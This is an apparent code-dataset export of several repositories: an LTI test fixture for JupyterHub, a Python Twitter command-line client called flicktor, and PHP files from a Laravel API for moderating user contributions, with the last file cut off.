\"launch_presentation_return_url\": \"https://canvas.instructure.com/courses/161/external_content/success/external_tool_redirect\",\n \"launch_presentation_width\": \"1000\",\n \"lis_outcome_service_url\": \"http://www.imsglobal.org/developers/LTI/test/v1p1/common/tool_consumer_outcome.php?b64=MTIzNDU6OjpzZWNyZXQ=\",\n \"lis_person_contact_email_primary\": \"[email protected]\",\n \"lis_person_name_family\": \"Bar\",\n \"lis_person_name_full\": \"Foo Bar\",\n \"lis_person_name_given\": \"Foo\",\n \"lti_message_type\": \"basic-lti-launch-request\",\n \"lis_result_sourcedid\": \"feb-123-456-2929::28883\",\n \"lti_version\": \"LTI-1p0\",\n \"resource_link_id\": \"888efe72d4bbbdf90619353bb8ab5965ccbe9b3f\",\n \"resource_link_title\": \"Test-Assignment\",\n \"roles\": roles,\n \"tool_consumer_info_product_family_code\": lms_vendor,\n \"tool_consumer_info_version\": \"cloud\",\n \"tool_consumer_instance_contact_email\": \"[email protected]\",\n \"tool_consumer_instance_guid\": \"srnuz6h1U8kOMmETzoqZTJiPWzbPXIYkAUnnAJ4u:test-lms\",\n \"tool_consumer_instance_name\": \"myedutool\",\n \"user_id\": \"185d6c59731a553009ca9b59ca3a885100000\",\n \"user_image\": \"https://lms.example.com/avatar-50.png\",\n }\n extra_args = {\"my_key\": \"this_value\"}\n headers = {\"Content-Type\": \"application/x-www-form-urlencoded\"}\n launch_url = \"http://jupyterhub/hub/lti/launch\"\n\n args.update(extra_args)\n\n base_string = signature.signature_base_string(\n \"POST\",\n signature.base_string_uri(launch_url),\n signature.normalize_parameters(\n 
signature.collect_parameters(body=args, headers=headers)\n ),\n )\n\n args[\"oauth_signature\"] = signature.sign_hmac_sha1(\n base_string, oauth_consumer_secret, None\n )\n return args\n\n return _make_lti11_basic_launch_args\n\n\[email protected](scope=\"function\")\ndef make_lti11_success_authentication_request_args():\n def _make_lti11_success_authentication_request_args(\n roles: str = \"Instructor\",\n ext_roles: str = \"urn:lti:instrole:ims/lis/Instructor\",\n lms_vendor: str = \"canvas\",\n oauth_consumer_key: str = \"my_consumer_key\",\n ):\n \"\"\"\n Return a valid request arguments make from LMS to our tool (when authentication steps were success)\n \"\"\"\n args = {\n \"oauth_callback\": [\"about:blank\".encode()],\n \"oauth_consumer_key\": [oauth_consumer_key.encode()],\n \"oauth_signature_method\": [\"HMAC-SHA1\".encode()],\n \"oauth_timestamp\": [\"1585947271\".encode()],\n \"oauth_nonce\": [\"01fy8HKIASKuD9gK9vWUcBj9fql1nOCWfOLPzeylsmg\".encode()],\n \"oauth_signature\": [\"abc123\".encode()],\n \"oauth_version\": [\"1.0\".encode()],\n \"context_id\": [\"888efe72d4bbbdf90619353bb8ab5965ccbe9b3f\".encode()],\n \"context_label\": [\"intro101\".encode()],\n \"context_title\": [\"intro101\".encode()],\n \"course_lineitems\": [\n \"my.platform.com/api/lti/courses/1/line_items\".encode()\n ],\n \"custom_canvas_assignment_title\": [\"test-assignment\".encode()],\n \"custom_canvas_course_id\": [\"616\".encode()],\n \"custom_canvas_enrollment_state\": [\"active\".encode()],\n \"custom_canvas_user_id\": [\"1091\".encode()],\n \"custom_canvas_user_login_id\": [\"[email protected]\".encode()],\n \"ext_roles\": [ext_roles.encode()],\n \"launch_presentation_document_target\": [\"iframe\".encode()],\n \"launch_presentation_height\": [\"1000\".encode()],\n \"launch_presentation_locale\": [\"en\".encode()],\n \"launch_presentation_return_url\": [\n \"https: //illumidesk.instructure.com/courses/161/external_content/success/external_tool_redirect\".encode()\n ],\n \"launch_presentation_width\": [\"1000\".encode()],\n \"lis_outcome_service_url\": [\n \"http://www.imsglobal.org/developers/LTI/test/v1p1/common/tool_consumer_outcome.php?b64=MTIzNDU6OjpzZWNyZXQ=\".encode()\n ],\n \"lis_person_contact_email_primary\": [\"[email protected]\".encode()],\n \"lis_person_name_family\": [\"Bar\".encode()],\n \"lis_person_name_full\": [\"Foo Bar\".encode()],\n \"lis_person_name_given\": [\"Foo\".encode()],\n \"lti_message_type\": [\"basic-lti-launch-request\".encode()],\n \"lis_result_sourcedid\": [\"feb-123-456-2929::28883\".encode()],\n \"lti_version\": [\"LTI-1p0\".encode()],\n \"resource_link_id\": [\"888efe72d4bbbdf90619353bb8ab5965ccbe9b3f\".encode()],\n \"resource_link_title\": [\"Test-Assignment-Another-LMS\".encode()],\n \"roles\": [roles.encode()],\n \"tool_consumer_info_product_family_code\": [lms_vendor.encode()],\n \"tool_consumer_info_version\": [\"cloud\".encode()],\n \"tool_consumer_instance_contact_email\": [\n \"[email protected]\".encode()\n ],\n \"tool_consumer_instance_guid\": [\n \"srnuz6h1U8kOMmETzoqZTJiPWzbPXIYkAUnnAJ4u:test-lms\".encode()\n ],\n \"tool_consumer_instance_name\": [\"myorg\".encode()],\n \"user_id\": [\"185d6c59731a553009ca9b59ca3a885100000\".encode()],\n \"user_image\": [\"https://lms.example.com/avatar-50.png\".encode()],\n }\n return args\n\n return _make_lti11_success_authentication_request_args\n\n\[email protected](scope=\"function\")\ndef make_lti11_mock_request_handler() -> RequestHandler:\n \"\"\"\n Sourced from 
https://github.com/jupyterhub/oauthenticator/blob/master/oauthenticator/tests/mocks.py\n \"\"\"\n\n def _make_lti11_mock_request_handler(\n handler: RequestHandler,\n uri: str = \"https://hub.example.com\",\n method: str = \"POST\",\n **settings: dict,\n ) -> RequestHandler:\n \"\"\"Instantiate a Handler in a mock application\"\"\"\n application = Application(\n hub=Mock(\n base_url=\"/hub/\",\n server=Mock(base_url=\"/hub/\"),\n ),\n cookie_secret=os.urandom(32),\n db=Mock(rollback=Mock(return_value=None)),\n **settings,\n )\n request = HTTPServerRequest(\n method=method,\n uri=uri,\n connection=Mock(),\n )\n handler = RequestHandler(\n application=application,\n request=request,\n )\n handler._transforms = []\n return handler\n\n return _make_lti11_mock_request_handler\n"
}
] | 2 |
minamorl/tw
|
https://github.com/minamorl/tw
|
5bbfff938e95c58ed00fa857d57bbc010d0065b3
|
4b657e13c02e6d125c856483e3d28aa24ac4dbef
|
e629066ce58c956256f089a87ea85bf8f884fca9
|
refs/heads/master
| 2016-09-08T01:55:24.753557 | 2016-02-16T18:27:01 | 2016-02-16T18:27:01 | 42,738,215 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6881252527236938,
"alphanum_fraction": 0.6894301772117615,
"avg_line_length": 33.05925750732422,
"blob_id": "679d7a2f7a98231c9836e1cee083be902db5669b",
"content_id": "cc644efb2a2a86e9fa6c66d869bbb849a8e0dac8",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4598,
"license_type": "permissive",
"max_line_length": 102,
"num_lines": 135,
"path": "/flicktor/subcommands.py",
"repo_name": "minamorl/tw",
"src_encoding": "UTF-8",
"text": "import argparse\n\nfrom . import *\n\ndef subcommand_say(args):\n api().statuses_update(status=args.status)\n\n\ndef subcommand_log(args):\n screen_name = args.screen_name or api().account_verify_credentials()['screen_name']\n logs = api().statuses_user_timeline(screen_name=screen_name)\n for l in logs:\n print_tweet(l)\n\n\ndef subcommand_list(args):\n screen_name = args.screen_name or api().account_verify_credentials()['screen_name']\n logs = api().lists_statuses(count=args.count, slug=args.slug, owner_screen_name=screen_name)\n for l in logs:\n print_tweet(l)\n\n\ndef subcommand_reply(args):\n screen_name = args.screen_name or api().account_verify_credentials()['screen_name']\n logs = api().statuses_mentions_timeline(screen_name=screen_name)\n for l in logs:\n print_tweet(l)\n\n\ndef subcommand_reply(args):\n screen_name = args.screen_name or api().account_verify_credentials()['screen_name']\n logs = api().statuses_mentions_timeline(screen_name=screen_name)\n for l in logs:\n print_tweet(l)\n\n\ndef subcommand_stream(args):\n screen_name = args.screen_name or api().account_verify_credentials()['screen_name']\n for l in api().user_stream():\n if \"text\" in l:\n print_tweet(l)\n\n\ndef subcommand_remove(args):\n username = args.screen_name or api().account_verify_credentials()['screen_name']\n\n followers = api().followers_ids(screen_name=username)['ids']\n followings = api().friends_ids(screen_name=username)['ids']\n\n for user in (api().lookup(str(user) for user in followings if user not in followers)):\n r = api().friendships_destroy(user_id=user['id_str'])\n print(r)\n\n\ndef subcommand_dm(args):\n received_dm = list(api().direct_messages(count=args.count))\n sent_dm = list(api().direct_messages_sent(count=args.count))\n\n dms = sorted(received_dm + sent_dm, key=lambda dm: parse_datetime(dm[\"created_at\"]), reverse=True)\n\n for l in dms:\n print_direct_message(l)\n\n\ndef follow_user_recursively(api, username: str, limit: int):\n import time\n followings = api.friends_ids(screen_name=username)['ids']\n\n for user_id in followings[:limit]:\n\n print(api.friendships_create(user_id=user_id))\n time.sleep(2)\n\n\ndef subcommand_follow(args):\n\n api().friendships_create(screen_name=args.screen_name)\n if args.recursive:\n follow_user_recursively(api(), args.screen_name, int(args.count))\n\n\ndef subcommand_search(args):\n\n tweets = api().search_tweets(q=args.query, count=100).get(\"statuses\")\n for t in tweets:\n print(t.get(\"text\"))\n\n\n\ndef _argpaser():\n parser = argparse.ArgumentParser()\n subparsers = parser.add_subparsers()\n\n subparser_say = subparsers.add_parser('say')\n subparser_say.add_argument('status')\n subparser_say.set_defaults(func=subcommand_say)\n\n subparser_stream = subparsers.add_parser('stream')\n subparser_stream.add_argument('screen_name', nargs='*', default=None)\n subparser_stream.set_defaults(func=subcommand_stream)\n\n subparser_log = subparsers.add_parser('log')\n subparser_log.add_argument('screen_name', nargs='*', default=None)\n subparser_log.add_argument('-c', '--count', default=None)\n subparser_log.set_defaults(func=subcommand_log)\n\n subparser_dm = subparsers.add_parser('dm')\n subparser_dm.add_argument('-c', '--count', default=None)\n subparser_dm.set_defaults(func=subcommand_dm)\n\n subparser_list = subparsers.add_parser('list')\n subparser_list.add_argument('slug')\n subparser_list.add_argument('screen_name', nargs='*', default=None)\n subparser_list.add_argument('-c', '--count', default=None)\n 
subparser_list.set_defaults(func=subcommand_list)\n\n subparser_reply = subparsers.add_parser('reply')\n subparser_reply.add_argument('screen_name', nargs='*', default=None)\n subparser_reply.set_defaults(func=subcommand_reply)\n\n subparser_remove = subparsers.add_parser('remove')\n subparser_remove.add_argument('screen_name', nargs='*', default=None)\n subparser_remove.set_defaults(func=subcommand_remove)\n\n subparser_search = subparsers.add_parser('search')\n subparser_search.add_argument('query', nargs='*', default=None)\n subparser_search.set_defaults(func=subcommand_search)\n\n subparser_follow = subparsers.add_parser('follow')\n subparser_follow.add_argument('-R', '--recursive', action='store_true', default=False)\n subparser_follow.add_argument('-c', '--count', default=20)\n subparser_follow.add_argument('screen_name', nargs='*', default=None)\n subparser_follow.set_defaults(func=subcommand_follow)\n\n return parser\n"
},
{
"alpha_fraction": 0.5333333611488342,
"alphanum_fraction": 0.5404762029647827,
"avg_line_length": 20,
"blob_id": "a0a088cf87c464fefa0c930a6d8b345b9b47d971",
"content_id": "b50bc7fa71e04aa8d029604579dbcd3b793df056",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 420,
"license_type": "permissive",
"max_line_length": 58,
"num_lines": 20,
"path": "/setup.py",
"repo_name": "minamorl/tw",
"src_encoding": "UTF-8",
"text": "from setuptools import setup, find_packages\n\nsetup(\n name=\"flicktor\",\n version=\"0.0.1\",\n packages=find_packages(),\n entry_points={\n 'console_scripts': ['tw = flicktor.__main__:main']\n },\n author='minamorl',\n author_email='[email protected]',\n install_requires=[\n 'staccato',\n 'clint',\n 'python-dateutil',\n 'requests',\n 'requests-oauthlib',\n 'pytz'\n ],\n)\n"
},
{
"alpha_fraction": 0.538226306438446,
"alphanum_fraction": 0.538226306438446,
"avg_line_length": 16.210525512695312,
"blob_id": "24a05749781f2a5dee21fdeb2526bbad12277fc5",
"content_id": "9b44b697d09dd6f3521f837f8774c5765aea68e5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 327,
"license_type": "permissive",
"max_line_length": 36,
"num_lines": 19,
"path": "/flicktor/__main__.py",
"repo_name": "minamorl/tw",
"src_encoding": "UTF-8",
"text": "from flicktor import subcommands\n\n\ndef main():\n parser = subcommands._argpaser()\n args = parser.parse_args()\n try: \n if hasattr(args, \"func\"):\n args.func(args)\n else:\n parser.print_help()\n\n\n except KeyboardInterrupt:\n print(\"bye.\")\n\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.6875,
"alphanum_fraction": 0.6883445978164673,
"avg_line_length": 30.13157844543457,
"blob_id": "64e20ba9aa839f866c4ee1a578ef63c7951dd04f",
"content_id": "d888bd7b828174b5e3f6bb9de6e6916925c79f71",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1184,
"license_type": "permissive",
"max_line_length": 128,
"num_lines": 38,
"path": "/flicktor/__init__.py",
"repo_name": "minamorl/tw",
"src_encoding": "UTF-8",
"text": "import functools\nimport configparser\nimport os\nimport argparse\nimport staccato\nimport clint\nimport datetime\nimport pytz\nimport dateutil.parser\n\n\ndef import_configurations(path):\n config = configparser.ConfigParser()\n config.read(os.path.expanduser(path))\n return config\n\n\ndef print_tweet(l):\n created_at = parse_datetime(l['created_at']).strftime('%Y-%m-%d %H:%M:%S')\n clint.textui.puts(clint.textui.colored.cyan(\"@{} - {}\".format(l['user']['screen_name'], created_at)))\n clint.textui.puts(\"{} - {} favs\".format(l['text'], l['favorite_count']))\n\n\ndef print_direct_message(l):\n clint.textui.puts(clint.textui.colored.cyan(\"@{} -> @{}\".format(l['sender']['screen_name'], l['recipient']['screen_name'])))\n clint.textui.puts(\"{}\".format(l['text']))\n\n\ndef parse_datetime(datetime_str):\n return dateutil.parser.parse(datetime_str).replace(tzinfo=pytz.utc).astimezone(pytz.timezone('Asia/Tokyo'))\n\n\[email protected]_cache()\ndef api():\n conf = import_configurations(\"~/.staccato.conf\")['OAuth1Settings']\n api = staccato.startup()\n api.auth(conf[\"CONSUMER_KEY\"], conf[\"CONSUMER_SECRET\"], conf[\"ACCESS_TOKEN_KEY\"], conf[\"ACCESS_TOKEN_SECRET\"])\n return api\n\n"
}
] | 4 |
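The `api()` helper in `flicktor/__init__.py` above hard-requires an INI file at `~/.staccato.conf` with an `[OAuth1Settings]` section. A minimal sketch of that file follows; the section and key names come straight from `api()`, while the credential values are placeholders:

```ini
[OAuth1Settings]
CONSUMER_KEY = your-consumer-key
CONSUMER_SECRET = your-consumer-secret
ACCESS_TOKEN_KEY = your-access-token
ACCESS_TOKEN_SECRET = your-access-token-secret
```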
hearing-voices-network/api
|
https://github.com/hearing-voices-network/api
|
ab51d5e4b74362a8290bb08006d22a738eba170c
|
c2f0f383984bd9aa05224263ea470f31f0bd04d4
|
32c913548cde253c3da6f0efc135ab4186a96e4d
|
refs/heads/master
| 2023-01-13T14:31:50.774977 | 2020-02-09T15:01:40 | 2020-02-09T15:01:40 | 186,593,639 | 0 | 0 |
MIT
| 2019-05-14T09:49:17 | 2020-02-09T15:04:13 | 2023-01-04T13:55:12 |
PHP
|
[
{
"alpha_fraction": 0.6782369017601013,
"alphanum_fraction": 0.6785123944282532,
"avg_line_length": 36.04081726074219,
"blob_id": "b5484ea8edd66f03d3a352166596b81f4aedab3f",
"content_id": "228d3130133cd3e85bec1b61d1d9cbc59f233c9b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 3630,
"license_type": "permissive",
"max_line_length": 81,
"num_lines": 98,
"path": "/app/Listeners/ContributionEventSubscriber.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Listeners;\n\nuse App\\Events\\Contribution\\ContributionApproved;\nuse App\\Events\\Contribution\\ContributionCreated;\nuse App\\Events\\Contribution\\ContributionRejected;\nuse App\\Events\\Contribution\\ContributionUpdated;\nuse App\\Mail\\TemplateMail;\nuse App\\Models\\Setting;\nuse App\\VariableSubstitution\\Email\\Admin\\NewContributionSubstituter;\nuse App\\VariableSubstitution\\Email\\Admin\\UpdatedContributionSubstituter;\nuse App\\VariableSubstitution\\Email\\EndUser\\ContributionApprovedSubstituter;\nuse App\\VariableSubstitution\\Email\\EndUser\\ContributionRejectedSubstituter;\nuse Illuminate\\Support\\Arr;\nuse Illuminate\\Support\\Facades\\Config;\n\nclass ContributionEventSubscriber extends EventSubscriber\n{\n /**\n * @return string[]\n */\n protected function mapping(): array\n {\n return [\n ContributionCreated::class => 'handleContributionCreated',\n ContributionUpdated::class => 'handleContributionUpdated',\n ContributionApproved::class => 'handleContributionApproved',\n ContributionRejected::class => 'handleContributionRejected',\n ];\n }\n\n /**\n * @param \\App\\Events\\Contribution\\ContributionCreated $event\n */\n public function handleContributionCreated(ContributionCreated $event): void\n {\n /** @var array $emailContent */\n $emailContent = Setting::findOrFail('email_content')->value;\n\n $this->dispatch(new TemplateMail(\n Config::get('connecting_voices.admin_email'),\n Arr::get($emailContent, 'admin.new_contribution.subject'),\n Arr::get($emailContent, 'admin.new_contribution.body'),\n new NewContributionSubstituter($event->getContribution())\n ));\n }\n\n /**\n * @param \\App\\Events\\Contribution\\ContributionUpdated $event\n */\n public function handleContributionUpdated(ContributionUpdated $event): void\n {\n /** @var array $emailContent */\n $emailContent = Setting::findOrFail('email_content')->value;\n\n $this->dispatch(new TemplateMail(\n Config::get('connecting_voices.admin_email'),\n Arr::get($emailContent, 'admin.updated_contribution.subject'),\n Arr::get($emailContent, 'admin.updated_contribution.body'),\n new UpdatedContributionSubstituter($event->getContribution())\n ));\n }\n\n /**\n * @param \\App\\Events\\Contribution\\ContributionApproved $event\n */\n public function handleContributionApproved(ContributionApproved $event): void\n {\n /** @var array $emailContent */\n $emailContent = Setting::findOrFail('email_content')->value;\n\n $this->dispatch(new TemplateMail(\n $event->getContribution()->endUser->user->email,\n Arr::get($emailContent, 'end_user.contribution_approved.subject'),\n Arr::get($emailContent, 'end_user.contribution_approved.body'),\n new ContributionApprovedSubstituter($event->getContribution())\n ));\n }\n\n /**\n * @param \\App\\Events\\Contribution\\ContributionRejected $event\n */\n public function handleContributionRejected(ContributionRejected $event): void\n {\n /** @var array $emailContent */\n $emailContent = Setting::findOrFail('email_content')->value;\n\n $this->dispatch(new TemplateMail(\n $event->getContribution()->endUser->user->email,\n Arr::get($emailContent, 'end_user.contribution_rejected.subject'),\n Arr::get($emailContent, 'end_user.contribution_rejected.body'),\n new ContributionRejectedSubstituter($event->getContribution())\n ));\n }\n}\n"
},
{
"alpha_fraction": 0.595061719417572,
"alphanum_fraction": 0.5953086614608765,
"avg_line_length": 27.928571701049805,
"blob_id": "127a185bb22bb4f04a9bbfd2bd93928dd4f3a810",
"content_id": "d073d4bbcbb8661fa6ce8bbe6a84a0e75ab4c5d6",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 4050,
"license_type": "permissive",
"max_line_length": 95,
"num_lines": 140,
"path": "/app/Services/ContributionService.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Services;\n\nuse App\\Events\\Contribution\\ContributionApproved;\nuse App\\Events\\Contribution\\ContributionCreated;\nuse App\\Events\\Contribution\\ContributionDeleted;\nuse App\\Events\\Contribution\\ContributionRejected;\nuse App\\Events\\Contribution\\ContributionUpdated;\nuse App\\Models\\Contribution;\nuse App\\Support\\Markdown;\nuse Illuminate\\Support\\Facades\\Date;\n\nclass ContributionService\n{\n /**\n * @var \\App\\Support\\Markdown\n */\n protected $markdown;\n\n /**\n * ContributionService constructor.\n *\n * @param \\App\\Support\\Markdown $markdown\n */\n public function __construct(Markdown $markdown)\n {\n $this->markdown = $markdown;\n }\n\n /**\n * @param array $data\n * @return \\App\\Models\\Contribution\n */\n public function create(array $data): Contribution\n {\n /** @var \\App\\Models\\Contribution $contribution */\n $contribution = Contribution::create([\n 'end_user_id' => $data['end_user_id'],\n 'content' => $this->markdown->sanitise($data['content']),\n 'status' => $data['status'],\n 'status_last_updated_at' => Date::now(),\n ]);\n\n $contribution->tags()->sync($data['tags']);\n\n event(new ContributionCreated($contribution));\n\n return $contribution;\n }\n\n /**\n * @param \\App\\Models\\Contribution $contribution\n * @param array $data\n * @return \\App\\Models\\Contribution\n */\n public function update(Contribution $contribution, array $data): Contribution\n {\n /*\n * The status logic goes as follows:\n * If the status is \"public\", then change it to \"in review\".\n * If the status is \"private\", then leave it as \"private\".\n * If the status is \"in review\", then leave it as \"in review\".\n * If the status is \"changes requested\", then change it to \"in review\".\n */\n $status = $data['status'] ?? $contribution->status;\n\n switch ($status) {\n case Contribution::STATUS_PUBLIC:\n case Contribution::STATUS_CHANGES_REQUESTED:\n $status = Contribution::STATUS_IN_REVIEW;\n break;\n }\n\n /** @var \\App\\Models\\Contribution $contribution */\n $contribution->update([\n 'content' => $this->markdown->sanitise($data['content'] ?? 
$contribution->content),\n 'status' => $status,\n 'changes_requested' => null,\n 'status_last_updated_at' => Date::now(),\n ]);\n\n if (isset($data['tags'])) {\n $contribution->tags()->sync($data['tags']);\n }\n\n event(new ContributionUpdated($contribution));\n\n return $contribution;\n }\n\n /**\n * @param \\App\\Models\\Contribution $contribution\n * @throws \\Exception\n */\n public function delete(Contribution $contribution): void\n {\n $contribution->tags()->sync([]);\n $contribution->delete();\n\n event(new ContributionDeleted($contribution));\n }\n\n /**\n * @param \\App\\Models\\Contribution $contribution\n * @return \\App\\Models\\Contribution\n */\n public function approve(Contribution $contribution): Contribution\n {\n $contribution->update([\n 'status' => Contribution::STATUS_PUBLIC,\n 'changes_requested' => null,\n 'status_last_updated_at' => Date::now(),\n ]);\n\n event(new ContributionApproved($contribution));\n\n return $contribution;\n }\n\n /**\n * @param \\App\\Models\\Contribution $contribution\n * @param string $changesRequested\n * @return \\App\\Models\\Contribution\n */\n public function reject(Contribution $contribution, string $changesRequested): Contribution\n {\n $contribution->update([\n 'status' => Contribution::STATUS_CHANGES_REQUESTED,\n 'changes_requested' => $changesRequested,\n 'status_last_updated_at' => Date::now(),\n ]);\n\n event(new ContributionRejected($contribution));\n\n return $contribution;\n }\n}\n"
},
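A hypothetical moderation flow for the `ContributionService` above; `$service`, `$endUser`, and `$tag` are assumed to exist, and the status transitions follow the `switch` in `update()`:

```php
// Sketch only: end user submits, admin rejects, user edits, admin approves.
$contribution = $service->create([
    'end_user_id' => $endUser->id,
    'content' => '**My story**',
    'status' => Contribution::STATUS_IN_REVIEW,
    'tags' => [$tag->id],
]);

$service->reject($contribution, 'Please remove personal names.');
// Status is now "changes requested"; an end-user edit...
$service->update($contribution, ['content' => '**My story**, anonymised']);
// ...moves it back to "in review", ready for approval.
$service->approve($contribution); // Status becomes "public".
```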
{
"alpha_fraction": 0.600923478603363,
"alphanum_fraction": 0.6015831232070923,
"avg_line_length": 21.294116973876953,
"blob_id": "93a8cb5290151d888781c5c1ca07f5a6faf91c6d",
"content_id": "d6d7985c02216149cb4c5506be494909b88a9905",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1516,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 68,
"path": "/app/Models/User.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models;\n\nuse GoldSpecDigital\\LaravelEloquentUUID\\Foundation\\Auth\\User as Authenticatable;\nuse Illuminate\\Database\\Eloquent\\SoftDeletes;\nuse Laravel\\Passport\\HasApiTokens;\n\nclass User extends Authenticatable\n{\n use Mutators\\UserMutators;\n use Relationships\\UserRelationships;\n use Scopes\\UserScopes;\n use HasApiTokens;\n use SoftDeletes;\n\n /**\n * The attributes that should be cast to native types.\n *\n * @var array\n */\n protected $casts = [\n 'email_verified_at' => 'datetime',\n 'created_at' => 'datetime',\n 'updated_at' => 'datetime',\n 'deleted_at' => 'datetime',\n ];\n\n /**\n * Send the password reset notification.\n *\n * @param string $token\n */\n public function sendPasswordResetNotification($token): void\n {\n $this->isAdmin()\n ? $this->admin->sendPasswordResetNotification($token)\n : $this->endUser->sendPasswordResetNotification($token);\n }\n\n /**\n * Send the email verification notification.\n */\n public function sendEmailVerificationNotification(): void\n {\n if ($this->isEndUser()) {\n $this->endUser->sendEmailVerificationNotification();\n }\n }\n\n /**\n * @return bool\n */\n public function isAdmin(): bool\n {\n return $this->admin !== null;\n }\n\n /**\n * @return bool\n */\n public function isEndUser(): bool\n {\n return $this->endUser !== null;\n }\n}\n"
},
{
"alpha_fraction": 0.5582472681999207,
"alphanum_fraction": 0.5600284934043884,
"avg_line_length": 20.9296875,
"blob_id": "f1a2812263af2288b6dd797655c2b0b7d4f10fd7",
"content_id": "ebaf1e9ec2f7e0c5763f2a455f8d396e8aa5b5b5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 2807,
"license_type": "permissive",
"max_line_length": 87,
"num_lines": 128,
"path": "/app/Models/File.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "<?php\n\ndeclare(strict_types=1);\n\nnamespace App\\Models;\n\nuse GoldSpecDigital\\LaravelEloquentUUID\\Database\\Eloquent\\Model;\nuse Illuminate\\Contracts\\Support\\Responsable;\nuse Illuminate\\Http\\Response;\nuse Illuminate\\Support\\Facades\\Storage;\n\nclass File extends Model implements Responsable\n{\n use Mutators\\FileMutators;\n use Relationships\\FileRelationships;\n use Scopes\\FileScopes;\n\n const MIME_TYPE_PNG = 'image/png';\n const MIME_TYPE_JPEG = 'image/jpeg';\n const MIME_TYPE_TXT = 'text/plain';\n\n /**\n * The attributes that should be cast to native types.\n *\n * @var array\n */\n protected $casts = [\n 'is_private' => 'boolean',\n 'created_at' => 'datetime',\n 'updated_at' => 'datetime',\n 'deleted_at' => 'datetime',\n ];\n\n /**\n * Create an HTTP response that represents the object.\n *\n * @param \\Illuminate\\Http\\Request $request\n * @return \\Illuminate\\Http\\Response\n */\n public function toResponse($request): Response\n {\n return response()->make($this->getContent(), Response::HTTP_OK, [\n 'Content-Type' => $this->mime_type,\n 'Content-Disposition' => sprintf('inline; filename=\"%s\"', $this->filename),\n ]);\n }\n\n /**\n * @return string\n */\n public function getContent(): string\n {\n return Storage::cloud()->get($this->path());\n }\n\n /**\n * @return string\n */\n public function path(): string\n {\n $directory = $this->is_private ? 'files/private' : 'files/public';\n\n return \"/{$directory}/{$this->id}.dat\";\n }\n\n /**\n * @return string\n */\n protected function visibility(): string\n {\n return $this->is_private ? 'private' : 'public';\n }\n\n /**\n * @return string\n */\n public function url(): string\n {\n return Storage::cloud()->url($this->path());\n }\n\n /**\n * @param string $content\n * @return \\App\\Models\\File\n */\n public function upload(string $content): self\n {\n Storage::cloud()->put($this->path(), $content, $this->visibility());\n\n return $this;\n }\n\n /**\n * @param string $content\n * @return \\App\\Models\\File\n */\n public function uploadBase64EncodedFile(string $content): self\n {\n $data = explode(',', $content);\n $data = base64_decode(end($data));\n\n return $this->upload($data);\n }\n\n /**\n * Deletes the file from disk.\n */\n public function deleteFromDisk(): void\n {\n Storage::cloud()->delete($this->path());\n }\n\n /**\n * @return bool\n */\n public function isPrivate(): bool\n {\n return $this->is_private;\n }\n\n /**\n * @return bool\n */\n public function isPublic(): bool\n {\n return !$this->isPrivate();\n }\n}\n"
},
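A hypothetical usage sketch for the `File` model above; `$request` is assumed to be an incoming HTTP request carrying a base64 image payload:

```php
$file = File::create([
    'filename' => 'avatar.png',
    'mime_type' => File::MIME_TYPE_PNG,
    'is_private' => false,
]);

// uploadBase64EncodedFile() splits on the comma before decoding, so it
// accepts either raw base64 or a full "data:image/png;base64,..." URI.
$file->uploadBase64EncodedFile($request->input('image'));

return $file; // File implements Responsable, so it renders via toResponse().
```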
{
"alpha_fraction": 0.6918032765388489,
"alphanum_fraction": 0.6918032765388489,
"avg_line_length": 22.461538314819336,
"blob_id": "b8fecad97d7bdb21e253d5f5a0a2b6df93508b8c",
"content_id": "a3cb8f43fc1f5f422c6d3721244aca6d75ba8f0f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 305,
"license_type": "permissive",
"max_line_length": 53,
"num_lines": 13,
"path": "/docker/app/usr/local/bin/start-container",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env bash\n\n# Run migrations.\nphp /var/www/html/artisan migrate --force\n\n# Cache config and routes, if not in dev environment.\nif [[ \"${APP_ENV}\" != \"local\" ]]; then\n php /var/www/html/artisan config:cache\n php /var/www/html/artisan route:cache\nfi\n\n# Start supervisor.\n/usr/bin/supervisord\n"
},
{
"alpha_fraction": 0.5391134023666382,
"alphanum_fraction": 0.5397652983665466,
"avg_line_length": 33.088890075683594,
"blob_id": "0cd2d316157aade7d2fc71608fd9ff07ece439ab",
"content_id": "38ba68d1fd8cb0e9f12f31c8315964ca9fab58be",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "PHP",
"length_bytes": 1534,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 45,
"path": "/app/Docs/Schemas/Notification/NotificationSchema.php",
"repo_name": "hearing-voices-network/api",
"src_encoding": "UTF-8",
